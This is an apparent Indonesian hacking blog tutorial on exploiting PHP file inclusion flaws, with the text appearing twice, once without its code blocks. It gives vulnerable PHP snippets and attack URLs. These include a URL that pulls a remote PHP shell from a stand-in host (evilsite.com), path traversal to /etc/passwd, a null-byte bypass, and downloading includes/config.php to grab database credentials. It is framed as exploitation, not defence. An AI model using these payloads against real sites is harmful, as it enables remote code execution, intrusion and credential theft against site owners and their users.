1. Remote File Inclusion
contoh script :
misal :
itu artinya isi dari index.php bakal di eksekusi kedalem get.php
phpshellcode : http://evilsite.com/evilscript.txt
exploitasi :
kita masukkin php shell code ke dalem get.php
caranya tinggal ubah index.php jadi URL phpshellcode kita.
kalo kita masukkin URL phpshellcode kita, nanti script akan berubah sementara jadi :
kadang ada script yang berisi :
jadi semisal kita include http://evilsite.com/evilscript.txt kita, bakal berubah URL-nya jadi http://evilsite.com/evilscript.txt.php
untuk menghilangkan .php di akhir URL shellcode kita, bisa kita tambah NULLBYTE ( ).
2. Local File Inclusion
contoh script :
sama kayak RFI. cuman kalo ini hanya berlaku buat include file di 1 server.
misal :
bisa juga kita pake NULLBYTE buat bypass.. sama kayak RFI.
3. Local File Disclosure/Download
contoh script :
kesalahan itu bisa dimanfaatkan untuk mendownload file sensitif seperti konfigurasi database.
misal :
CONTOH DALAM GAMBAR NEEEHHH!!!
isi vulnerable file..
![[Image: 1lfifile.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tsr5aDC6UOzQeamXG3S1yw0oXQUvscAnlO0_sHlP0PAwj1jG1oT-zSSzjYSq3GuYJKi5RMofyJ2mv2eJTLbTeRrvz0nb9KNOtdlqpxZ4S3Hc57pxeyEoQ=s0-d)
berikut isi file yang mau kita eksekusi..
![[Image: 2isitext.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sI3IWzfn8MVnMioTKVZ1QuRniWOm5kqWZgv15Mi8kzaaq1ILd3VMKv1mLSq_gY4O9bL9qJ5ksINmFRB6q6i2nsCBIORVXeQlIJuWm8CeKKRmh2wDshFAU=s0-d)
berikut gambar file yang ter-eksekusi..
![[Image: 3executed.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_udEKYoK489XFmnUVe4AzEej1TAAfcqk3asl564jugH74E5OlErIpQhRqNjWI5GxguXJy2KEfWkB2R0oU7jirwK3ROoFyyvuj7upfpoUusjdL-GU-j7ipTg=s0-d)
berikut contoh pesan error LFI..
![[Image: 5gagallfi.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v_dvsIDCbJhCCzJbHszEvzsfLYRUmzuFIdAfJLaGbU4FqpwJ9NqZ9WGpEYH5Jp5TQOvu8yWW56JV-oQQUkNWP4vO02wLe66RWfSwiqzHetY39B2yow6ztb=s0-d)
berikut contoh pesan error RFI
![[Image: 4errorrfi.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uhTe1y9foBxswCt5EGYX15g92s3tOFxVDe9yvWVPJfUBmsjSu9Xft9vKnYPoD52vrWE_QFgmWAhHlsqSn6bPTAx6uRUiidtRPkPCVi752gr5oje70-xxyk=s0-d)
RFI gagal karena setting allow_url_include di php.ini OFF..
![[Image: 6phpini.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uZXaYb7KVAOb3FW9qFxOLVkqxC2lnIGmFDOCU2zXoND0paoA-hXl7jSbtI0CH0Ph8MEJatlZPsu2UJiYrTRioEylAwD9AkjJi27EQRwhlXPpUzwj1egg=s0-d)
SEKIAN
contoh script :
Code:
<?php $page=$_GET['file'];
include($page);
?>misal :
Code:
http://www.sh4dhckr.com/get.php?file=index.phpphpshellcode : http://evilsite.com/evilscript.txt
exploitasi :
kita masukkin php shell code ke dalem get.php
caranya tinggal ubah index.php jadi URL phpshellcode kita.
Code:
http://www.sh4dhckr.com/get.php?file=http://evilsite.com/evilscript.txtkalo kita masukkin URL phpshellcode kita, nanti script akan berubah sementara jadi :
Code:
<?php $page="http://evilsite.com/evilscript.txt";
include($page);
?>kadang ada script yang berisi :
Code:
<?php
$page=$_GET['page'];
include($page.'.php');
?>jadi semisal kita include http://evilsite.com/evilscript.txt kita, bakal berubah URL-nya jadi http://evilsite.com/evilscript.txt.php
untuk menghilangkan .php di akhir URL shellcode kita, bisa kita tambah NULLBYTE ( ).
Code:
http://www.sh4dhckr.com/get.php?file=http://evilsite.com/evilscript.txt2. Local File Inclusion
contoh script :
Code:
<?php
$page=$_GET['page'];
include('/pages/'.$page);
?>sama kayak RFI. cuman kalo ini hanya berlaku buat include file di 1 server.
misal :
Code:
http://www.sh4dhckr.com/get.php?file=../../../../../../../../../../etc/passwdbisa juga kita pake NULLBYTE buat bypass.. sama kayak RFI.
3. Local File Disclosure/Download
contoh script :
Code:
$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));
//header( "Content-Description: File Transfer");
@readfile($file);
die();kesalahan itu bisa dimanfaatkan untuk mendownload file sensitif seperti konfigurasi database.
misal :
Code:
http://www.sh4dhckr.com/get.php?file=includes/config.phpCONTOH DALAM GAMBAR NEEEHHH!!!
isi vulnerable file..
berikut isi file yang mau kita eksekusi..
berikut gambar file yang ter-eksekusi..
berikut contoh pesan error LFI..
berikut contoh pesan error RFI
RFI gagal karena setting allow_url_include di php.ini OFF..
SEKIAN

Posting Komentar